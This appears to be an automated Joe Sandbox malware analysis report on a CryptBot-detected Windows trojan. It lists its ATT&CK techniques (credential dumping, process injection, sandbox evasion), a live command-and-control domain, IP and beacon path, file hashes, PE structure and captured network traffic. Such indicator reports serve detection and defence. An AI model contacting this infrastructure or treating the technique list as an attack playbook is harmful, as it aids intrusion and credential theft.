ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ZFttiy4Tt8.exe56%VirustotalBrowse
ZFttiy4Tt8.exe61%ReversingLabsWin32.Trojan.CryptBot
ZFttiy4Tt8.exe100%AviraTR/Crypt.TPM.Gen
ZFttiy4Tt8.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd40%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
81.29.149.125
truefalse
    		high
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalse
      		high
      httpbin.org
      		3.218.7.103
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmlZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://html4/loose.dtdZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/alt-svc.html#ZFttiy4Tt8.exefalse
                    		high
                    https://httpbin.org/ipbeforeZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.htmlZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://curl.se/docs/hsts.html#ZFttiy4Tt8.exefalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://curl.se/docs/alt-svc.htmlZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.cssZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=ZFttiy4Tt8.exe, 00000002.00000002.2289092739.0000000007510000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://.jpgZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    81.29.149.125
                                    		home.fiveth5ht.topSwitzerland
                                    		39616COMUNICA_IT_SERVICESCHfalse
                                    3.218.7.103
                                    		httpbin.orgUnited States
                                    		14618AMAZON-AESUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1581610
                                    Start date and time:2024-12-28 09:52:32 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 13s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:24
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:ZFttiy4Tt8.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:8cb06b0904107a21706822f2f2d90832.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 40.126.53.8, 20.199.58.43, 2.16.158.33, 13.107.246.63, 20.223.36.55, 52.149.20.212, 2.16.158.170, 150.171.28.10
                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    03:53:32API Interceptor3x Sleep call for process: ZFttiy4Tt8.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    81.29.149.125e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    3.218.7.103e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                      A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                          vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                            GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                              xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                  w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                    QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                      OoYYtngD7d.exeGet hashmaliciousUnknownBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        httpbin.orge62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        fp2e7a.wpc.phicdn.netrpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 192.229.221.95
                                                        http://volmar.sinformations.cfdGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        OTRykEzo6o.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        ctfmon.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        wce.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                        • 192.229.221.95
                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                        • 192.229.221.95
                                                        vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        V2s8yjvIJw.exeGet hashmaliciousIris StealerBrowse
                                                        • 192.229.221.95
                                                        home.fiveth5ht.tope62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
                                                        5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        COMUNICA_IT_SERVICESCHe62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                        • 81.29.149.45
                                                        hmips.elfGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.178
                                                        AMAZON-AESUSe62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        No created / dropped files found

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                        Entropy (8bit):7.982091166646042
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • VXD Driver (31/22) 0.00%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:ZFttiy4Tt8.exe
                                                        File size:4'528'640 bytes
                                                        MD5:8cb06b0904107a21706822f2f2d90832
                                                        SHA1:37dee7617a62f9a5e5853cc977a125be54ac58b7
                                                        SHA256:05dd7b104f2c11892363053cfa4d3feed76b39614b34764ac571893b9495e2c4
                                                        SHA512:23cfb74398c11ebb58060b2da0414008aaba5479e20790c4e7dae1325c24f34996b4ee8aff1ec4b23211be2fcfcb4f3395da117cd414ecea79adfe90ddd9ed7a
                                                        SSDEEP:98304:x2MM2EP0mQedsJTfKVAakoJykzhZczXGozRrrM3GR7fvkoLsw/ji:x2t3Vuu3FWzWozR4GR0s3
                                                        TLSH:EC263371C9FE1507CCFBD63D087297A6C9C21F432BCE9A1C66DE85091DABB0466B3681
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................w.E...@... ............................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x104a000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                        DLL Characteristics:DYNAMIC_BASE
                                                        Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                        Authenticode Signature

                                                        Signature Valid:
                                                        Signature Issuer:
                                                        Signature Validation Error:
                                                        Error Number:
                                                        Not Before, Not After
                                                          Subject Chain
                                                            Version:
                                                            Thumbprint MD5:
                                                            Thumbprint SHA-1:
                                                            Thumbprint SHA-256:
                                                            Serial:

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007FB6E88EEECAh
                                                            psubb mm0, qword ptr [eax+eax+00h]
                                                            add byte ptr [eax], al
                                                            add cl, ch
                                                            add byte ptr [eax], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [edx+ecx], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc482340x10ivnslrrb
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc481e40x18ivnslrrb
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x6db0000x288a00e2d4923926421c29da8b2b6ede093138unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x6dc0000x1ac0x2004fb8010be5ec8f056c54261ae0f1dc9cFalse0.58203125data4.566955777548672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x6de0000x3a50000x200aab351558a0bdf722840afaf1ec4654aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            ivnslrrb0xa830000x1c60000x1c54002ac548e8b7cdc4fdb6edc14e3f0c964fFalse0.9946421030405406data7.955475045686641IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            jopxztyl0xc490000x10000x400e62e3417e6d2f92c07915f6f66187cfbFalse0.7412109375data5.896959447047402IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xc4a0000x30000x2200cc12b76140b0144a29460f02fbff82f6False0.06755514705882353DOS executable (COM)0.8340242830560558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xc482440x152ASCII text, with CRLF line terminators0.6479289940828402

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 09:53:27.126532078 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:27.126575947 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:27.126672029 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:27.181885958 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:27.181909084 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.045763969 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.046457052 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.046482086 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.047424078 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.047482967 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.048888922 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.048957109 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.060295105 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.060300112 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.102596998 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.401710987 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.402085066 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:29.402149916 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.412586927 CET49717443192.168.2.63.218.7.103
                                                            Dec 28, 2024 09:53:29.412611008 CET443497173.218.7.103192.168.2.6
                                                            Dec 28, 2024 09:53:32.118295908 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.237935066 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.239604950 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.241182089 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.360769987 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.360800982 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.360810995 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.360851049 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.360850096 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.360905886 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.360920906 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.360965014 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.360974073 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.361023903 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.361066103 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.361077070 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.361109018 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.361119032 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.361133099 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.361174107 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.480535984 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.480565071 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.480627060 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.480648994 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.480691910 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.480712891 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.480813026 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.480846882 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.480861902 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.480890989 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.481215954 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.524976969 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.525134087 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.641371965 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.641458035 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:32.684942007 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.804889917 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:32.804984093 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.004945993 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.005804062 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.252899885 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.253143072 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.294723988 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.297092915 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.297275066 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.372752905 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.372833967 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.416851044 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.416871071 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.416958094 CET4972080192.168.2.681.29.149.125
                                                            Dec 28, 2024 09:53:33.417031050 CET804972081.29.149.125192.168.2.6
                                                            Dec 28, 2024 09:53:33.417036057 CET804972081.29.149.125192.168.2.6
